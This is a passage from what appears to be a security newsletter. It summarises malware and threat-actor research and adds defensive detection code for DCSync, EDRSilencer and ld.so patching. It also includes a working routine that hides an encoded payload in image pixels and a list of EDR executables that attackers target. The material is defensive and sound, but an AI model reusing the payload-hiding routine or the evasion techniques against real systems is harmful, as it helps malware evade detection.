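    if account.endswith("$") and account[:-1].upper() in {d.upper() for d in trusted_dcs}:
        return ("info", account, sorted(rights))  # normal DC-to-DC replication
    if account.upper() in {k.upper() for k in known}:
        return ("low", account, sorted(rights))  # expected, but worth periodic review
    # Get-Changes-All is what actually yields secrets (password hashes).
    severity = "high" if "DS-Replication-Get-Changes-All" in rights else "medium"
    if DOMAIN_DNS_CLASS in event.get("ObjectType", "").lower():
        severity = severity  # domain naming context; the object DCSync targets
    return (severity, account, sorted(rights))


def dcsync_alerts(events, min_severity="medium"):
    order = {"info": 0, "low": 1, "medium": 2, "high": 3}
    hits = (classify_dcsync(e) for e in events)
    return [h for h in hits if h and order[h[0]] >= order[min_severity]]


if __name__ == "__main__":
    for sev, who, rights in dcsync_alerts(SAMPLE_EVENTS, "info"):
        print(sev, who, ", ".join(rights))
```

The logic is the same one a SIEM rule would express: 4662 events carrying the replication GUIDs, with the subject not being a domain controller computer account or a known replicator such as an Entra Connect sync account. Auditing "Directory Service Access" must be enabled on the DCs for 4662 to be generated at all, and the object type check narrows the match to the domain naming context that DCSync targets.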
How to inspect TLS encrypted traffic - The article covers three ways to inspect TLS-encrypted traffic: decryption with the server's RSA private key, decryption with a TLS key log, and a TLS inspection proxy. RSA private key decryption lets Wireshark decrypt captured SSL/TLS sessions using the server's private key, but it only works when the session used RSA key exchange; with (EC)DHE cipher suites or TLS 1.3 the private key does not recover the session keys. Key log decryption instead uses the per-session secrets exported by the client or server (for example via SSLKEYLOGFILE), which Wireshark can use to decrypt any TLS version, but it requires access to that key material. A TLS inspection proxy acts as a man-in-the-middle that terminates and re-establishes TLS, with the drawback that clients must trust the proxy's root Certificate Authority certificate. Each method has its own advantages and limitations depending on the specific challenge at hand.
Unpacking Snake Keylogger - This blog is about unpacking a Snake Keylogger malware sample for malware analysis. The malware is described as an Infostealer, Keylogger, and Clipboard-Hijacker that first appeared in 2019. The unpacking process involves decompiling the .NET assembly, decrypting the payload, examining process injections and obfuscation techniques, and analyzing the final payload. The final payload is identified as the Snake Keylogger malware family, which can steal data and send it via the Telegram API, FTP, or SMTP. This blog also discusses decrypting config variables and accessing the Telegram bot associated with the malware.
UAT-5647 targets Ukrainian and Polish entities with RomCom malware variants - UAT-5647, a Russian-speaking threat actor, has been targeting Ukrainian and Polish entities with RomCom malware variants since late 2023. The attacks involve multiple malware families including RustClaw, MeltingClaw, DustyHammock, and ShadyHammock. The threat actor has been focusing on long-term access and data exfiltration for espionage purposes, with potential plans to deploy ransomware in the future. The infection chain consists of spear-phishing emails delivering malware downloaders and backdoors, followed by post-compromise activity such as lateral movement, system discovery, and data exfiltration.
Fake LockBit, Real Damage: Ransomware Samples Abuse AWS S3 to Steal Data - The article discusses a Golang ransomware sample that abuses Amazon S3 to exfiltrate victim files and masquerades as LockBit ransomware. It highlights the discovery of hard-coded AWS credentials in the samples, resulting in AWS account suspensions. The blog also emphasizes the importance of monitoring cloud resources for malicious activities and the need for vigilant security measures such as proactive threat detection and response capabilities like XDR. It concludes with a statement from AWS confirming the suspension of the reported AWS access keys and account due to policy violations.
Silent Threat: Red Team Tool EDRSilencer Disrupting Endpoint Security Solutions - Trend Micro's Threat Hunting Team has identified a red team tool called EDRSilencer, which threat actors are using to block EDR traffic and hide malicious activity. The tool disrupts the transmission of telemetry and alerts to EDR management consoles, making it difficult to detect and remove malware. By blocking network communication for EDR processes, EDRSilencer can evade detection and allow malicious activities to go undetected, posing a significant threat to organizations.
Call stack spoofing explained using APT41 malware - Call stack spoofing hides suspicious activity from security software by constructing a fake call stack that mimics a legitimate one, so that a stack walk taken at the moment of a sensitive API call looks benign. A malware sample attributed to the APT41 group implements this technique to deceive antivirus and EDR software. The sample decrypts the strings it needs at runtime using AES and resolves handles into kernelbase.dll before executing its malicious code. The spoof itself rewrites return addresses on the stack and chains JOP gadgets to redirect execution flow, so the code that actually issues the call never appears in the stack trace.
Feline Hackers Among Us? (A Deep Dive and Simulation of the Meow Attack) - Trustwave revisits the Meow attack, in which automated scripts located unsecured databases such as Elasticsearch and MongoDB and wiped their contents, leaving behind indexes with 'meow' in the name. The attack needed no exploit: it relied on misconfigurations such as database ports exposed to the internet and default or absent credentials. A simulation of the attack using Docker and a Python script demonstrates how easily it can be carried out. Despite advances in security, misconfigured databases still pose a significant risk, and the article stresses closing exposure and enforcing authentication promptly to prevent data destruction.
Analysis of the Crypt Ghouls group: continuing the investigation into a series of attacks on Russia - The article analyzes the tools and techniques used by the Crypt Ghouls hacktivists, who have targeted Russian businesses and government agencies with ransomware. The group uses a variety of tools, including Mimikatz, XenAllPasswordPro, AnyDesk, and LockBit 3.0, to harvest login credentials, conduct network reconnaissance, and spread ransomware. There are similarities between the tactics, techniques, and procedures used by Crypt Ghouls and other hacker groups targeting Russia, indicating possible collaboration or resource sharing among different groups. The analysis highlights the challenges in identifying specific malicious actors behind the wave of attacks on Russian organizations.
Detection of “EDRSilencer” - The article discusses the detection of a tool called "EDRSilencer" that blocks Endpoint Detection and Response (EDR) agents from reporting security events to the server. The tool operates by maintaining a list of EDR-related process names and blocking outbound traffic for any detected EDR processes using Windows Filtering Platform (WFP). It also introduces the concept of custom WFP providers to manage the filters. The article provides instructions on how to detect the activity of EDRSilencer and enable auditing for this type of activity.
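Turning the two EDRSilencer entries above into a concrete check, as an added example that is not code from either article or from the tool: it triages Windows Security event 5447 (Filtering Platform filter change) records for newly added WFP block filters on an egress layer whose application-ID condition names an EDR executable. It assumes 5447 auditing is enabled (the "Audit Filtering Platform Policy Change" subcategory) and that the events are available as dicts keyed by the event's standard field names; the EDR binary list is illustrative, the filter display name "Custom Outbound Filter" is a tunable indicator taken from my recollection of the public tool's defaults rather than from the articles, and the sample events are constructed.

```python
"""Triage Windows Security event 5447 (Filtering Platform filter change) records
for WFP block filters aimed at EDR processes, the pattern EDRSilencer relies on.

Added example for the two EDRSilencer entries; not code from either article or
from the tool. Assumes 5447 auditing is enabled and events arrive as dicts with
the event's standard field names. The EDR binary list is illustrative and the
filter name is an assumed indicator; the sample events are constructed.
"""

# Executables whose outbound traffic an attacker would want to silence. Extend
# for the agents in your estate; names are matched case-insensitively.
EDR_BINARIES = {
    "msmpeng.exe", "mssense.exe", "senseir.exe", "sensendr.exe", "sensecncproxy.exe",
    "csfalconservice.exe", "csfalconcontainer.exe",
    "sentinelagent.exe", "sentinelservicehost.exe",
    "elastic-agent.exe", "elastic-endpoint.exe",
    "cylancesvc.exe", "xagt.exe", "taniumclient.exe", "qualysagent.exe",
}
SUSPICIOUS_FILTER_NAMES = {"custom outbound filter"}   # assumed default name of the public tool


def basename(path: str) -> str:
    """Last component of a DOS or NT device path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower().strip('"')


def edr_targets_in(conditions: str):
    """EDR executables referenced anywhere in the rendered Conditions text.

    WFP application-ID conditions carry the image path in NT device form
    (\\device\\harddiskvolumeN\\...), so match on the file name, not the prefix."""
    hits = set()
    for token in conditions.replace("\n", " ").split():
        name = basename(token)
        if name in EDR_BINARIES:
            hits.add(name)
    return sorted(hits)


def triage_5447(ev):
    """Return the reasons this event looks like EDR telemetry suppression, or []."""
    if ev.get("EventID") != 5447 or ev.get("ChangeType") != "Add":
        return []                                  # only newly added filters matter
    if ev.get("Action") != "Block":
        return []
    layer = ev.get("LayerName", "").lower()
    if "connect" not in layer and "outbound" not in layer:
        return []                                  # not an egress layer
    targets = edr_targets_in(ev.get("Conditions", ""))
    if not targets:
        return []                                  # blocking something else
    reasons = [f"outbound block filter on EDR binary: {', '.join(targets)}"]
    if ev.get("FilterName", "").lower() in SUSPICIOUS_FILTER_NAMES:
        reasons.append(f"filter name {ev['FilterName']!r} matches known tooling")
    provider = ev.get("ProviderName", "")
    if provider and "microsoft" not in provider.lower():
        reasons.append(f"non-Microsoft WFP provider {provider!r}")   # custom provider, see article
    return reasons


def triage_all(events):
    """RecordId -> reasons, for every event that deserves an analyst's attention."""
    out = {}
    for ev in events:
        reasons = triage_5447(ev)
        if reasons:
            out[ev.get("RecordId")] = reasons
    return out


SAMPLE_EVENTS = [   # constructed, not real telemetry
    {"EventID": 5447, "RecordId": 101, "ChangeType": "Add", "Action": "Block",
     "LayerName": "ALE Connect v4 Layer", "FilterName": "Custom Outbound Filter",
     "ProviderName": "", "ProcessId": 4412,
     "Conditions": "Application ID: \\device\\harddiskvolume3\\program files\\windows defender advanced threat protection\\mssense.exe"},
    {"EventID": 5447, "RecordId": 102, "ChangeType": "Add", "Action": "Block",
     "LayerName": "ALE Connect v4 Layer", "FilterName": "Block Chrome",
     "ProviderName": "Microsoft Corporation",
     "Conditions": "Application ID: \\device\\harddiskvolume3\\program files\\google\\chrome\\application\\chrome.exe"},
    {"EventID": 5447, "RecordId": 103, "ChangeType": "Add", "Action": "Permit",
     "LayerName": "ALE Connect v4 Layer", "FilterName": "Allow Sense",
     "Conditions": "Application ID: \\device\\harddiskvolume3\\program files\\windows defender advanced threat protection\\mssense.exe"},
    {"EventID": 5447, "RecordId": 104, "ChangeType": "Delete", "Action": "Block",
     "LayerName": "ALE Connect v6 Layer", "FilterName": "Custom Outbound Filter",
     "Conditions": "Application ID: \\device\\harddiskvolume3\\program files\\crowdstrike\\csfalconservice.exe"},
]

if __name__ == "__main__":
    for rid, reasons in triage_all(SAMPLE_EVENTS).items():
        print(rid, "->", "; ".join(reasons))
```

Two caveats a responder should keep in mind. First, the tool's whole point is that the EDR console stops receiving telemetry, so this check has to run on a log source the filter cannot block (Windows Event Forwarding from the host, or a local scheduled hunt), not inside the EDR pipeline. Second, on a live host `netsh wfp show filters` dumps the current filter set to XML and is the quickest way to confirm and then remove an offending filter, even when 5447 auditing was off at the time it was added.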
EIW — ESET Israel Wiper — used in active attacks targeting Israeli orgs - The EIW — ESET Israel Wiper — has been used in active attacks targeting Israeli organizations. The attacks were carried out through phishing emails that appeared to come from ESET Israel, containing a malicious setup.exe file. The malware is designed to wipe files and appears to be linked to Iran-based threat groups. ESET has released an antivirus signature to detect related activity.
Microsoft Defender XDR's Deception Technology - Microsoft Defender XDR's deception capability, once enabled, plants decoy accounts and hosts on the network to lure attackers. The post shows that the decoys are not invisible: the PowerShell used to seed them leaves traces in a host's PowerShell logs, and by reviewing the executed script blocks one can confirm which accounts are decoys. Knowing that footprint helps defenders validate the feature and judge how well the lures hold up against an attacker who reads the same logs.
New macOS vulnerability, “HM Surf”, could lead to unauthorized data access - Microsoft Threat Intelligence uncovered a macOS vulnerability referred to as "HM Surf" that allows attackers to bypass the operating system's Transparency, Consent, and Control (TCC) technology, granting unauthorized access to a user's protected data. The vulnerability involves modifying configuration files in the Safari browser directory to access a user's data without consent. Apple released a fix for this vulnerability, now identified as CVE-2024-44133. Microsoft encourages macOS users to apply security updates to protect against potential exploitation. Microsoft Defender for Endpoint detects and blocks exploitation of this vulnerability, providing protection against threats like Adload that may exploit the vulnerability.
bedevil: Dynamic Linker Patching - The blog post discusses bedevil, an LD_PRELOAD rootkit that runs in userland and targets VMware vCenter servers. The rootkit includes a feature called Dynamic Linker Patching, which modifies the system's dynamic linker (ld.so) itself rather than relying only on the well-known /etc/ld.so.preload file that defenders routinely check. This gives attackers a stealth advantage and presents challenges for defenders trying to detect intrusions. The post delves into the patching technique, exploring how it works and what it means for both red and blue teams in terms of detection and mitigation.
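An added example of the blue-team side of this, not code from the post or the rootkit: it locates a binary's dynamic linker from its ELF PT_INTERP entry and then checks that linker image for the stock "/etc/ld.so.preload" string, reporting any replacement path-like string that mentions ld.so. It assumes the kind of linker patch that swaps the preload path for another one (one common form of dynamic linker patching) and would not, by itself, catch a patch that hooks loading logic elsewhere. The minimal ELF and the two linker images in the demo are constructed; run it with no arguments on a Linux host to check the real linker behind /bin/sh.

```python
"""Locate a binary's dynamic linker via PT_INTERP and check that linker image for
a patched preload path.

Added example for the bedevil entry; not code from the post or the rootkit. It
assumes the linker patch replaces the "/etc/ld.so.preload" string in ld.so with
another path so that defenders checking /etc/ld.so.preload see nothing. The
fake ELF and the two fake linker images below are constructed for the demo.
"""
import re
import struct

PT_INTERP = 3
EXPECTED_PRELOAD = b"/etc/ld.so.preload"
# Paths a stock glibc ld.so legitimately contains (nohwcap only in older builds).
LEGIT_LD_PATHS = {EXPECTED_PRELOAD, b"/etc/ld.so.cache", b"/etc/ld.so.nohwcap"}
STRING_RE = re.compile(rb"[\x20-\x7e]{4,}")     # printable ASCII runs, like strings(1)


def interp_path(elf: bytes):
    """Return the PT_INTERP path of an ELF64 image, or None if it has none."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2:
        raise ValueError("not an ELF64 image")
    end = "<" if elf[5] == 1 else ">"               # EI_DATA: 1 = little-endian
    (e_phoff,) = struct.unpack_from(end + "Q", elf, 32)
    e_phentsize, e_phnum = struct.unpack_from(end + "HH", elf, 54)
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, _flags, p_offset, _va, _pa, p_filesz = struct.unpack_from(end + "IIQQQQ", elf, off)
        if p_type == PT_INTERP:
            return elf[p_offset:p_offset + p_filesz].rstrip(b"\x00").decode()
    return None


def preload_check(linker: bytes):
    """Return (verdict, alternates). verdict is 'ok' when the stock preload path
    is present and 'preload-path-missing' otherwise; alternates lists other
    path-like strings mentioning ld.so, i.e. the replacement path to go look at."""
    strings = [m.group() for m in STRING_RE.finditer(linker)]
    alternates = sorted({s for s in strings
                         if s.startswith(b"/") and b"ld.so" in s and s not in LEGIT_LD_PATHS})
    verdict = "ok" if EXPECTED_PRELOAD in strings else "preload-path-missing"
    return verdict, alternates


def build_fake_elf(interp: bytes) -> bytes:
    """Minimal little-endian ELF64 with a single PT_INTERP segment (demo input only)."""
    phoff, interp_off = 64, 64 + 56
    ehdr = (b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8 +
            struct.pack("<HHIQQQIHHHHHH", 2, 0x3E, 1, 0, phoff, 0, 0, 64, 56, 1, 64, 0, 0))
    phdr = struct.pack("<IIQQQQQQ", PT_INTERP, 4, interp_off, 0, 0,
                       len(interp) + 1, len(interp) + 1, 1)
    return ehdr + phdr + interp + b"\x00"


# Constructed stand-ins for a clean and a patched ld.so .rodata section.
CLEAN_LINKER = b"\x00GNU C Library\x00/etc/ld.so.cache\x00/etc/ld.so.preload\x00LD_PRELOAD\x00"
PATCHED_LINKER = CLEAN_LINKER.replace(b"/etc/ld.so.preload", b"/etc/ld.so.rootkit")

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "/bin/sh"
    with open(target, "rb") as f:
        ld = interp_path(f.read())
    with open(ld, "rb") as f:
        verdict, alternates = preload_check(f.read())
    print(ld, verdict, [a.decode() for a in alternates])
```

Treat a "preload-path-missing" verdict as a lead, not a conviction: confirm it against the package manager (`rpm -V glibc` or `dpkg --verify libc6`) and, because an LD_PRELOAD rootkit can lie to every userland tool on the box, do that from a trusted boot medium or by pulling the file off the host and checking it elsewhere.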
Tricks and Treats: GHOSTPULSE's new pixel-level deception - The GHOSTPULSE malware has evolved to embed malicious data directly within the pixel values of an image, making it harder to detect and requiring new analysis and detection techniques. Recent campaigns pair this with creative social engineering that tricks victims into executing malicious commands themselves. Elastic Security Labs has updated its YARA rules and configuration extractor tool to detect and analyze both old and new versions of GHOSTPULSE. The malware now recovers its configuration and payload by reading the image's pixels, a significant change from its earlier method of hiding the payload inside the PNG file's IDAT chunk data.
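To make the pixel-parsing idea concrete, here is an added example of the general approach (sequential RGB channel bytes, with the hidden structure located by an integrity check rather than a fixed offset). It is not Elastic's extractor and the header layout used here (little-endian length, 4-byte XOR key, CRC32 of the plaintext) is hypothetical; the real loader's structure is documented in Elastic's write-up. Pixels are plain (r, g, b) tuples so the demo runs without an imaging library, and the cover image and payload are constructed.

```python
"""Recover a payload hidden in the raw RGB values of an image, the general approach
GHOSTPULSE's new variant takes (sequential pixel bytes located by an integrity check).

Added example for this newsletter entry. It is not Elastic's extractor, and the
header layout (little-endian length, 4-byte XOR key, CRC32 of the plaintext) is
hypothetical. Pixels are (r, g, b) tuples so no imaging library is needed; the
cover image and the payload below are constructed.
"""
import random
import struct
import zlib

HEADER = struct.Struct("<III")   # hypothetical: payload length, XOR key, CRC32(plaintext)


def pixels_to_bytes(pixels):
    """Flatten pixels into the byte stream a loader would walk: R, G, B, R, G, B, ..."""
    return bytes(channel for pixel in pixels for channel in pixel)


def bytes_to_pixels(buf):
    """Inverse of pixels_to_bytes; zero-pads so every pixel has three channels."""
    buf = buf + b"\x00" * (-len(buf) % 3)
    return [tuple(buf[i:i + 3]) for i in range(0, len(buf), 3)]


def xor_stream(data, key):
    """XOR data with the 4-byte little-endian key, repeated."""
    k = key.to_bytes(4, "little")
    return bytes(b ^ k[i % 4] for i, b in enumerate(data))


def embed(payload, key, cover_pixels, offset):
    """Write header + XOR-encoded payload over the cover's channel bytes at `offset`.
    The result is still a valid pixel array, just with a patch of 'noise' in it."""
    buf = bytearray(pixels_to_bytes(cover_pixels))
    blob = HEADER.pack(len(payload), key, zlib.crc32(payload)) + xor_stream(payload, key)
    if offset + len(blob) > len(buf):
        raise ValueError("cover image too small for payload")
    buf[offset:offset + len(blob)] = blob
    return bytes_to_pixels(bytes(buf))


def find_payload(buf, max_len=1 << 16):
    """Scan every byte offset for a header whose CRC32 validates the decoded payload.
    This is how a loader finds its config without knowing where the packer put it,
    and it is also what an extractor has to do. Returns (offset, plaintext) or None."""
    for off in range(len(buf) - HEADER.size):
        length, key, crc = HEADER.unpack_from(buf, off)
        if not 0 < length <= max_len or off + HEADER.size + length > len(buf):
            continue                                   # cheap sanity check before decoding
        start = off + HEADER.size
        plain = xor_stream(buf[start:start + length], key)
        if zlib.crc32(plain) == crc:
            return off, plain
    return None


def demo():
    """Hide a constructed config in a 64x64 noise image and recover it; also show
    that the same scan over the untouched cover finds nothing."""
    rng = random.Random(7)
    cover = [(rng.randrange(256), rng.randrange(256), rng.randrange(256)) for _ in range(64 * 64)]
    payload = b'{"c2":"203.0.113.7:443","sleep":30}'       # constructed config, TEST-NET-3 address
    stego = embed(payload, key=0x5A3C96E1, cover_pixels=cover, offset=3000)
    return find_payload(pixels_to_bytes(stego)), find_payload(pixels_to_bytes(cover))


if __name__ == "__main__":
    print(demo())
```

The detection lesson is in find_payload: because the payload sits in pixel values rather than in a trailing chunk, file-format checks (valid PNG, plausible dimensions, no data after IEND) all pass, and a static extractor has to decode the image and search the pixel buffer the same way the loader does.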
IcePeony with the '996' work culture - IcePeony is a previously unknown China-nexus APT group that has been active since at least 2023, targeting government agencies, academic institutions, and political organizations in countries including India, Vietnam, and Mauritius. Their activity timestamps suggest they operate under harsh working conditions consistent with the '996' work culture (9 a.m. to 9 p.m., six days a week). They use a custom IIS malware called IceCache and have been expanding their targets over time. Their activities suggest they are working on behalf of China's national interests, possibly in support of China's maritime strategy.
ClickFix tactic: The Phantom Meet - This post describes a social engineering technique, ClickFix, as used in a campaign built around fake Google Meet pages. The target is lured to a page that displays a bogus error and instructs them to "fix" it by pasting a command into the Run dialog or a terminal and executing it themselves, which bypasses the email and download controls that look for malicious attachments. The executed command fetches and runs the attacker's payload, typically an infostealer, giving the attacker initial access and stolen credentials.
New to Me and Miscellaneous
This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!
HijackLoader evolution: abusing genuine signing certificates - Recently, there has been an increase in the deployment of the "Lumma Stealer" malware through the "HijackLoader" loader, with some samples signed with genuine code-signing certificates. The post gives a detailed analysis of the deployment workflow, including a fake CAPTCHA campaign and DLL sideloading, and highlights the evolution of HijackLoader's tactics, in which signed malware samples evade detection that trusts signed binaries. The investigation also led to the identification and revocation of multiple abused code-signing certificates, underlining the need for layered detection rather than treating a valid signature as a clean bill of health.
How I found a P2 Misrouting issue affecting all Google Cloud Load Balancers - The author discovered a P2 misrouting vulnerability affecting all Google Cloud Load Balancers connected to storage buckets, which could expose sensitive information and lead to potential attacks on thousands of websites. By sending unconventional HTTP requests, the author found that load balancers were disclosing bucket names, allowing for exploitation in unexpected ways. The issue was reported, triaged, and rewarded as a P2 severity issue, with a fix implemented in September 2024. The author highlights the importance of reverse proxy security and encourages further exploration of this often overlooked area in cybersecurity.
Should We Chat, Too? Security Analysis of WeChat's MMTLS Encryption Protocol - The report analyzes the security and privacy properties of WeChat's MMTLS encryption protocol, finding weaknesses in the custom cryptography used: a TLS-like outer layer (MMTLS) wrapped around a non-standard inner "business-layer" encryption. The analysis argues that a standard protocol such as TLS or QUIC+TLS would be both more secure and more performant. Recommendations are given for application developers, Tencent and WeChat developers, high-risk users, security and privacy researchers, and operating systems. The report includes the disclosure to Tencent and their response, in which Tencent said the weaknesses in the inner-layer encryption are being addressed by switching to AES-GCM.
Off the Fox Den Bookshelf: Security and Tech Books We Love - Bishop Fox's team has curated a list of recommended security and tech books for professionals at all levels. The page also carries the firm's own news: it has been named Leader in the GigaOm Radar for the third year in a row, offers offensive security services including Cosmos Attack Surface Management, Application Penetration Testing, and External Penetration Testing, provides eBooks, guides, and bulletins for cybersecurity professionals, runs partner programs, and has expanded to Mexico.
The Black Team Ops honeypot - SpacialSec conducted a social experiment by creating a fake course called Black Team Ops, which generated a significant amount of interest and registrations. They used this opportunity to collect information on potential threat actors and created a honeypot for educational purposes. The team also used this experience to promote their CTIStream™ product for threat intelligence gathering. Additionally, the experiment highlighted the growing interest in criminal activities such as SIM swapping and the importance of cyber security awareness.